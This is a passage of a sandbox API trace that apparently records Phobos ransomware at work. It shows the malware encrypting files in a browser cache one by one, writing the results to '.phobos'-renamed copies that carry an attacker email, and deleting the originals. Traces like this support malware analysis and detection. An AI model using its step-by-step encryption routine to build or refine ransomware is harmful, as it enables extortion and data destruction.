(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png")) returned 0x2020 [0169.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.108] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.108] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.109] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.109] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.109] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c8, lpOverlapped=0x0) returned 1 [0169.193] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0169.193] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0169.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0169.193] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.193] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.193] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.193] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.194] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.194] CloseHandle (hObject=0x190) returned 1 [0169.194] CloseHandle (hObject=0x158) returned 1 [0169.194] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png")) returned 1 [0169.194] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.195] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8679) returned 1 [0169.195] CloseHandle (hObject=0x158) returned 1 [0169.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm")) returned 0x2020 [0169.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.196] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.196] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.196] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21e7, lpOverlapped=0x0) returned 1 [0169.215] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21f0, dwBufLen=0x21f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21f0) returned 1 [0169.215] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x21f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x21f0, lpOverlapped=0x0) returned 1 [0169.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0169.216] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.216] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.216] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.216] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.216] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.216] CloseHandle (hObject=0x158) returned 1 [0169.216] CloseHandle (hObject=0x190) returned 1 [0169.216] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm")) returned 1 [0169.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.218] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28) returned 1 [0169.218] CloseHandle (hObject=0x190) returned 1 [0169.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js")) returned 0x2020 [0169.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.219] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.219] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.219] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.219] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1c, lpOverlapped=0x0) returned 1 [0169.227] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20, dwBufLen=0x20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20) returned 1 [0169.228] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x20, lpOverlapped=0x0) returned 1 [0169.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0169.228] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.228] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0169.228] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.228] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0169.229] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.229] CloseHandle (hObject=0x190) returned 1 [0169.229] CloseHandle (hObject=0x158) returned 1 [0169.229] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js")) returned 1 [0169.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.230] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=464) returned 1 [0169.230] CloseHandle (hObject=0x158) returned 1 [0169.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png")) returned 0x2020 [0169.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.230] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.230] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.235] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.235] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1d0, lpOverlapped=0x0) returned 1 [0169.315] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1e0) returned 1 [0169.315] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1e0, lpOverlapped=0x0) returned 1 [0169.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0169.315] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.315] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.315] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.316] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.316] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.316] CloseHandle (hObject=0x158) returned 1 [0169.316] CloseHandle (hObject=0x190) returned 1 [0169.316] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png")) returned 1 [0169.317] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.318] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=784) returned 1 [0169.318] CloseHandle (hObject=0x190) returned 1 [0169.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png")) returned 0x2020 [0169.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.318] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.318] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0169.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0169.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0169.318] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.319] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x310, lpOverlapped=0x0) returned 1 [0169.362] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x320, dwBufLen=0x320 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x320) returned 1 [0169.362] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x320, lpOverlapped=0x0) returned 1 [0169.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, 